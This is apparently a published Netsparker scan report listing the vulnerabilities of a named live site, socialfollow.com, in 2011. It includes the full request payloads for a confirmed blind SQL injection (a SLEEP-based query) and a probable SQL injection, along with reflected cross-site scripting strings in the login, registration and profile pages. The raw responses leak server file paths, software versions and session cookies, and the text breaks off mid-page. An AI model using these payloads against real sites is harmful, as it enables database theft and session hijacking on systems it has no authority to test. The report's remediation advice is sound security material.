Netsparker, Web Application Security Scanner

SQL Injection, Focal File Inclusion, XSS, DORK, www.socialfollow.com SUMMARY

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.socialfollow.com/
SCAN DATE
4/19/2011 8:17:28 PM
REPORT DATE
4/19/2011 9:12:54 PM
SCAN DURATION
00:25:45

Total Requests

Average Speed

req/sec.
31
identified
14
confirmed
3
critical
7
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
10 %
IMPORTANT
29 %
MEDIUM
6 %
LOW
32 %
INFORMATION
23 %

GHDB, DORK VULNERABILITIES

GHDB, DORK VULNERABILITIES
URL Parameter Method Vulnerability Confirmed
/ Cookie Not Marked As HttpOnly Yes
/blog/c/future-features/ E-mail Address Disclosure No
/blog/wp-comments-post.php Internal Server Error Yes
/blog/wp-content/themes/social-follow-theme2/ [Possible] Internal Path Leakage (*nix) No
/button/ b GET [Probable] SQL Injection No
Database Error Message No
[Possible] Internal Path Leakage (*nix) No
/button/image/ b GET Blind SQL Injection Yes
b GET [Probable] SQL Injection No
[Possible] Local File Inclusion No
b GET Programming Error Message No
MySQL Database Identified Yes
[Possible] Internal Path Leakage (*nix) No
/forgot-password.php tEmail POST Cross-site Scripting Yes
/js/ Forbidden Resource Yes
/login.php tEmail POST Cross-site Scripting Yes
tEmail POST Cross-site Scripting Yes
/profiles/ Query Based QUERYSTRING Cross-site Scripting Yes
[Possible] PHP Source Code Disclosure No
/register.php tEmail POST Cross-site Scripting Yes
tName POST Cross-site Scripting Yes
tPassword POST Cross-site Scripting Yes
[Possible] PHP Source Code Disclosure No
/sitemap.php Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/sitemap.xml Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
Perl Version Disclosure No
Sitemap Identified No
Blind SQL Injection

Blind SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /button/image/

/button/image/ CONFIRMED

http://www.socialfollow.com/button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Parameters

Parameter Type Value
b GET -111 OR SLEEP(25)=0 LIMIT 1--

Request

GET /button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Last-Modified: Tue, 19 Apr 2011 20:18:40 -0500
Accept-Ranges: bytes
Content-Length: 1190
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: image/gif


[Probable] SQL Injection

[Probable] SQL Injection

2 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%2527

Parameters

Parameter Type Value
b GET %27

Request

GET /button/image/?b=%2527 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
- /button/

/button/

http://www.socialfollow.com/button/?b=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%..

Parameters

Parameter Type Value
b GET (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

Request

GET /button/?b=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:10 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript


<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>var menu(select={divclass:'sociallinks(select',inlinestyle:'visibility:hidden',linktarget:'secwin'};menu(select.cols={divclass:'column',inlinestyle:''};menu(select.items=[];var socialfollow={init:function(targetclass){socialfollow(select.init(targetclass);}}var socialfollow(select={menusmap:{},effects:{delayhide:200,shadow:{enabled:true,opacity:0.3,depth:[5,5]},fade:{enabled:false,duration:500}},dimensions:{},getoffset:function(what,offsettype){return(what.offsetParent)?what[offsettype]+this.getoffset(what.offsetParent,offsettype):what[offsettype]},getoffsetof:function(el){el._offsets={left:this.getoffset(el,"offsetLeft"),top:this.getoffset(el,"offsetTop"),h:el.offsetHeight}},getdimensions:function(menu){this.dimensions={anchorw:menu.anchorobj.offsetWidth,anchorh:menu.anchorobj.offsetHeight,docwidth:(window.innerWidth||this.standardbody.clientWidth)-20,docheight:(window.innerHeight||this.standardbody.clientHeight)-15,docscrollx:window.pageXOffset||this.standardbody.scrollLeft,docscrolly:window.pageYOffset||this.standardbody.scrollTop}if(!this.dimensions.dropmenuw){this.dimensions.dropmenuw=menu.dropmenu.offsetWidth;this.dimensions.dropmenuh=menu.dropmenu.offsetHeight;}},isContained:function(m,e){var e=window.event||e;var c=e.relatedTarget||((e.type=="mouseover")?e.fromElement:e.toElement)while(c&&c!=m)try{c=c.parentNode}catch(e){c=m}return(c==m)?true:false;},setopacity:function(el,value){el.style.opacity=value;if(typeof el.style.opacity!="string"){el.style.MozOpacity=value;if(el.filters)el.style.filter="progid:DXImageTransform.Microsoft.alpha(opacity="+value*100+")"}},showmenu:function(menuid){var menu=socialfollow(select.menusmap[menuid];clearTimeout(menu.hidetimer);this.getoffsetof(menu.anchorobj);this.getdimensions(menu);var posx=menu.anchorobj._offsets.left+(menu.orientation=="lr"?this.dimensions.anchorw:0);var posy=menu.anchorobj._offsets.top+this.dimensions.anchorh-(menu.orientation=="lr"?this.dimensions.anchorh:0)if(posx+this.dimensions.dropmenuw+this.effects.shadow.depth[0]>this.dimensions.docscrollx+this.dimensions.docwidth){posx=posx-this.dimensions.dropmenuw+(menu.orientation=="lr"?-this.dimensions.anchorw:this.dimensions.anchorw);}if(posy+this.dimensions.dropmenuh>this.dimensions.docscrolly+this.dimensions.docheight){posy=Math.max(posy-this.dimensions.dropmenuh-(menu.orientation=="lr"?-this.dimensions.anchorh:this.dimensions.anchorh),this.dimensions.docscrolly);}if(this.effects.fade.enabled){this.setopacity(menu.dropmenu,0);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,0);}menu.dropmenu.setcss({left:posx+'px',top:posy+'px',visibility:'visible'});if(this.effects.shadow.enabled){menu.shadow.setcss({left:posx+socialfollow(select.effects.shadow.depth[0]+'px',top:posy+socialfollow(select.effects.shadow.depth[1]+'px',visibility:'visible'});}if(this.effects.fade.enabled){clearInterval(menu.animatetimer);menu.curanimatedegree=0;menu.starttime=new Date().getTime();menu.animatetimer=setInterval(function(){socialfollow(select.revealmenu(menuid)},20);}},revealmenu:function(menuid){var menu=socialfollow(select.menusmap[menuid];var elapsed=new Date().getTime()-menu.starttime;if(elapsed<this.effects.fade.duration){this.setopacity(menu.dropmenu,menu.curanimatedegree);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,menu.curanimatedegree*this.effects.shadow.opacity);}else{clearInterval(menu.animatetimer);this.setopacity(menu.dropmenu,1);menu.dropmenu.style.filter="";}menu.curanimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow(select.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetclass){if(document.querySelectorAll){return document.querySelectorAll("."+targetclass);}else{var classnameRE=new RegExp("(^|\\s+)"+targetclass+"($|\\s+)","i");var pieces=[];var alltags=document.all?document.all:document.getElementsByTagName("*");for(var i=0;i<alltags.length;i++){if(typeof alltags[i].className=="string"&&alltags[i].className.search(classnameRE)!=-1)pieces[pieces.length]=alltags[i];}return pieces;}},addDiv:function(divid,divclass,inlinestyle){var el=document.createElement("div");if(divid)el.id=divid;el.className=divclass;el.style.cssText=inlinestyle;document.body.insertBefore(el,document.body.firstChild);return el;},getmenuHTML:function(menuobj){var menucontent=[];var frag="";for(var i=0;i<menuobj.items.length;i++){if(menuobj.items[i][0]=="All Social Sites..."){frag+='<li><a href="javascript:popUp(400,100,600,300,1);" class="allSites">'+menuobj.items[i][0]+'</a></li>\n';menucontent.push(frag);frag="";}else{var socialSite=menuobj.items[i][0];var socialSiteID=menuobj.items[i][1];var socialSiteLink=menuobj.items[i][2];frag+='<li><a class="c'+socialSiteID+'" href="http://www.socialfollow.com/button/link?b=(select&amp;r='+document.referrer+'&amp;s='+socialSiteID+'&amp;l='+socialSiteLink+'" target="'+menuobj.linktarget+'">'+socialSite+'</a></li>\n';if(menuobj.items[i][3]=="efc"||i==menuobj.items.length-1){menucontent.push(frag);frag="";}}}if(typeof menuobj.cols=="undefined"){return'<ul>\n'+menucontent.join('')+'\n</ul>';}else{frag="<div class='show' style='padding: 0 3px;display:none'>";for(var i=0;i<menucontent.length;i++){frag+='<div class="'+menuobj.cols.divclass+'" style="'+menuobj.cols.inlinestyle+'">\n<ul>\n'+menucontent[i]+'</ul>\n</div>\n';}frag+="</div>";frag+='<div class="paddingSmall show" style="display:none"><div class="socialFollowLink"><a href="http://www.socialfollow.com/" target="_blank"><img src="http://www.socialfollow.com/button/image-link/?b=(select&amp;r='+document.referrer+'" border="0" alt="Get your own Social Follow button!" /></a></div></div>';frag+='<div class="bottomBorder show" style="display:none">&nbsp;</div>';return frag;}},addEvent:function(targetarr,functionref,tasktype){if(targetarr.length>0){var target=targetarr.shift()if(target.addEventListener){target.addEventListener(tasktype,functionref,false);}else if(target.attachEvent){target.attachEvent('on'+tasktype,function(){return functionref.call(target,window.event)});}this.addEvent(targetarr,functionref,tasktype);}},setupmenu:function(targetclass,anchorobj,pos){this.standardbody=(document.compatMode=="CSS1Compat")?document.documentElement:document.body;var relattr='menu(select';dropmenuid='menu(select';var dropmenuvar=window[dropmenuid];var dropmenu=this.addDiv(null,dropmenuvar.divclass,dropmenuvar.inlinestyle);dropmenu.innerHTML=this.getmenuHTML(dropmenuvar);var menu=this.menusmap[targetclass+pos]={id:targetclass+pos,anchorobj:anchorobj,dropmenu:dropmenu,revealtype:(relattr.length!=dropmenuid.length&&RegExp.$1=="click")?"click":"mouseover",orientation:anchorobj.getAttribute("rev")=="lr"?"lr":"ud",shadow:this.addDiv(null,"anylinkshadow",null)}menu.anchorobj._internalID=targetclass+pos;menu.anchorobj._isanchor=true;menu.dropmenu._internalID=targetclass+pos;menu.shadow._internalID=targetclass+pos;menu.dropmenu.setcss=this.setcss;menu.shadow.style.display="none";menu.shadow.setcss=this.setcss;menu.shadow.setcss({display:"block"});this.setopacity(menu.shadow,this.effects.shadow.opacity);this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){var menu=socialfollow(select.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="mouseover"&&!socialfollow(select.isContained(this,e)){socialfollow(select.showmenu(menu.id);}else if(typeof this._isanchor=="undefined"){clearTimeout(menu.hidetimer);}},"mouseover");this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){if(!socialfollow(select.isContained(this,e)){var menu=socialfollow(select.menusmap[this._internalID];menu.hidetimer=setTimeout(function(){socialfollow(select.hidemenu(menu.id)},socialfollow(select.effects.delayhide);}},"mouseout");this.addEvent([menu.anchorobj,menu.dropmenu],function(e){var menu=socialfollow(select.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="click"){if(menu.dropmenu.style.visibility=="visible"){socialfollow(select.hidemenu(menu.id);}else{socialfollow(select.showmenu(menu.id);}if(e.preventDefault){e.preventDefault();}return false}else{menu.hidetimer=setTimeout(function(){socialfollow(select.hidemenu(menu.id)},socialfollow(select.effects.delayhide);}},"click");},init:function(targetclass){var headID=document.getElementsByTagName("head")[0];var cssNode=document.createElement('link');cssNode.type='text/css';cssNode.rel='stylesheet';cssNode.href='http://www.socialfollow.com/button/css/?b=(select&n=&socialSites=';cssNode.media='screen';headID.appendChild(cssNode);var imgs=this.getElementsByClass(targetclass);for(var i=0;i<imgs.length;i++){if('done'!=imgs[i].getAttribute('rel')){imgs[i].setAttribute('rel','done');this.setupmenu(targetclass,imgs[i],i);this.border="0";var hidden_divs=this.getElementsByClass('show');setTimeout(function(){for(var i=0;i<hidden_divs.length;i++){if('undefined'!=typeof(hidden_divs[i].style))hidden_divs[i].style.display='';}},200);}}}}function openwindow(url){document.body.removeChild(document.getElementById('popup'));document.body.removeChild(document.getElementById('popup1'));window.open(url);}function check_browser(){var re=/\s+(X?HTML)\s+([\d\.]+)\s*([^\/]+)*\/(?:[^"]+"\s"([^"]+)")?/gi;var res=false;metaCollection=document.getElementsByTagName('meta');for(i=0;i<metaCollection.length;i++){if('X-UA-Compatible'==metaCollection[i].httpEquiv&&'IE=EmulateIE7'==metaCollection[i].content)return false;}if(typeof document.namespaces!="undefined"){res=(8==document.all[0].nodeType)?re.test(document.all[0].nodeValue):false;}else{res=(null!=document.doctype)?re.test(document.doctype.publicId):false;}if(res){res=new Object();var type=RegExp.$1;var version=RegExp.$2;var doctype_extended=RegExp.$3.toLowerCase();var doctype_url=RegExp.$4if((/strict\.dtd/.test(doctype_url)||'strict'==doctype_extended)||(('HTML'==type&&'4.01'==version)&&!/http:\/\//.test(doctype_url)))return false;return(('XHTML'==type&&'1.0'==version)||('HTML'==type&&'4.01'==version))?true:false;return result;}else{return false;}}
Cross-site Scripting

Cross-site Scripting

7 TOTAL
IMPORTANT
CONFIRMED
7
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /profiles/

/profiles/ CONFIRMED

http://www.socialfollow.com/profiles/?"><script>alert(9)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING "><script>alert(9)</script>

Request

GET /profiles/?"><script>netsparker(9)</script> HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Profile Listing | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><link type="text/css" rel="stylesheet" href="/css/profile-listing.css" /><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button class='selected'">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="profile"> <h1>New <span class="orange">Profiles</span></h1> <div class="left" style="padding-top: 0;"> <div class="grad-box"><div class="grad-inner"> <br /> <table cellpadding="0" cellspacing="0" width="100%" class="listing"> <tr> <td width="49%" valign="top" height="150" style="padding-top: 0;"> <a href="/profiles/steffas-and-associates/" title="Steffas And Associates" class="pic"><span style="height:108px;"><img src="/images/profiles/steffas-and-associates-f217905b3c87b4e7c2d0da3b9035ee87.jpg" alt="Steffas And Associates" width="80" /></span></a> <p class="name"><a href="/profiles/steffas-and-associates/" title="Steffas And Associates" class="green name">Steffas And Associates</a></p> <p class="desc orange"> Steffas & Associates, P.C. is an AV Rated boutique law firm, which limits [...]</p> <p class="fullProfile"><a href="/profiles/steffas-and-associates/" title="Steffas And Associates">View Full <span class="green">Profile &gt;</span></a></p> </td> <td width="49%" valign="top" height="150" style="padding-top: 0;"> <a href="/profiles/all-tech-investigations/" title="All Tech Investigations" class="pic"><span style="height:105px;"><img src="/images/profiles/all-tech-investigations-5dc6f9239c60bfc31d7a8bbbda3aac47.jpg" alt="All Tech Investigations" width="80" /></span></a> <p class="name"><a href="/profiles/all-tech-investigations/" title="All Tech Investigations" class="green name">All Tech Investigations</a></p> <p class="desc orange"> Texas Private Investigations<br />
Texas Process Server<br />
Texas [...]</p> <p class="fullProfile"><a href="/profiles/all-tech-investigations/" title="All Tech Investigations">View Full <span class="green">Profile &gt;</span></a></p> </td> </tr><tr> <td width="49%" valign="top" height="150" style="border-bottom: none;"> <a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt" class="pic"><span style="height:128px;"><img src="/images/profiles/gerhard-schwandt-99311c6b751ad596f53ca36e3f1503e4.jpg" alt="Gerhard Schwandt" width="80" /></span></a> <p class="name"><a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt" class="green name">Gerhard Schwandt</a></p> <p class="desc orange"> Our Mission Statement:<br />
<br />
A business world of stable and [...]</p> <p class="fullProfile"><a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt">View Full <span class="green">Profile &gt;</span></a></p> </td> <td width="49%" valign="top" height="150" style="border-bottom: none;"> <a href="/profiles/flyingpacket/" title="" class="pic"><span style="height:97px;"><img src="/images/profiles/flyingpacket-814a90483680dc132a346b2aec87b698.jpg" alt="" width="80" /></span></a> <p class="name"><a href="/profiles/flyingpacket/" title="" class="green name"></a></p> <p class="desc orange"> GANA PREMIOS EN EFECTIVO, MUCHA SUERTE [...]</p> <p class="fullProfile"><a href="/profiles/flyingpacket/" title="">View Full <span class="green">Profile &gt;</span></a></p> </td> </tr> </table> <div class="hr-green"></div> </div></div> <br /> </div> <div class="right"> <div class="banner"> <a href="/" title="Social Follow"><img src="/images/banner-social-follow.gif" alt="Signup for Social Follow" /></a> </div> <br /> <h4>Sponsor</h4> <div class="banner"> <p align="center"><a href="http://www.sendarticles.com/?ad=sa" title="SendArticles.com Article Submission Service" target="_blank"><img src="http://www.sendarticles.com/banners/banner.gif" alt="SendArticles.com Article Submission Service" /></a></p> </div> </div> <!-- End: Right Section --> <div id="navigateProfiles"> <h2>Navigate <span class="orange">Profiles</span></h2> <div class="grad-box"> <div id="list-top"> <ul> <li><a href="/profiles/?letter=A" title='View profiles starting with "A"' class="selected">A</a></li><li><a href="/profiles/?letter=B" title='View profiles starting with "B"'>B</a></li><li><a href="/profiles/?letter=C" title='View profiles starting with "C"'>C</a></li><li><a href="/profiles/?letter=D" title='View profiles starting with "D"'>D</a></li><li><a href="/profiles/?letter=E" title='View profiles starting with "E"'>E</a></li><li><a href="/profiles/?letter=F" title='View profiles starting with "F"'>F</a></li><li><a href="/profiles/?letter=G" title='View profiles starting with "G"'>G</a></li><li><a href="/profiles/?letter=H" title='View profiles starting with "H"'>H</a></li><li><a href="/profiles/?letter=I" title='View profiles starting with "I"'>I</a></li><li><a href="/profiles/?letter=J" title='View profiles starting with "J"'>J</a></li><li><a href="/profiles/?letter=K" title='View profiles starting with "K"'>K</a></li><li><a href="/profiles/?letter=L" title='View profiles starting with "L"'>L</a></li><li><a href="/profiles/?letter=M" title='View profiles starting with "M"'>M</a></li><li><a href="/profiles/?letter=N" title='View profiles starting with "N"'>N</a></li><li><a href="/profiles/?letter=O" title='View profiles starting with "O"'>O</a></li><li><a href="/profiles/?letter=P" title='View profiles starting with "P"'>P</a></li><li><a href="/profiles/?letter=Q" title='View profiles starting with "Q"'>Q</a></li><li><a href="/profiles/?letter=R" title='View profiles starting with "R"'>R</a></li><li><a href="/profiles/?letter=S" title='View profiles starting with "S"'>S</a></li><li><a href="/profiles/?letter=T" title='View profiles starting with "T"'>T</a></li><li><a href="/profiles/?letter=U" title='View profiles starting with "U"'>U</a></li><li><a href="/profiles/?letter=V" title='View profiles starting with "V"'>V</a></li><li><a href="/profiles/?letter=W" title='View profiles starting with "W"'>W</a></li><li><a href="/profiles/?letter=X" title='View profiles starting with "X"'>X</a></li><li><a href="/profiles/?letter=Y" title='View profiles starting with "Y"'>Y</a></li><li><a href="/profiles/?letter=Z" title='View profiles starting with "Z"'>Z</a></li> </ul> <img src="/images/profile_list-divider.gif" alt="" width="2" height="30" style="float: left;" /> <div id="listSearch"> <form action="" method="get" name="fSearch"> <input type="text" name="search" maxlength="100" style="width: 160px;" /> <input type="submit" value="Search" style="color: #FFFFFF; background-color: transparent; font-size: 12px; font-weight:bold;" onmouseover="this.style.cursor='pointer';" /> </form> </div> </div> <div id="list-body"> <div 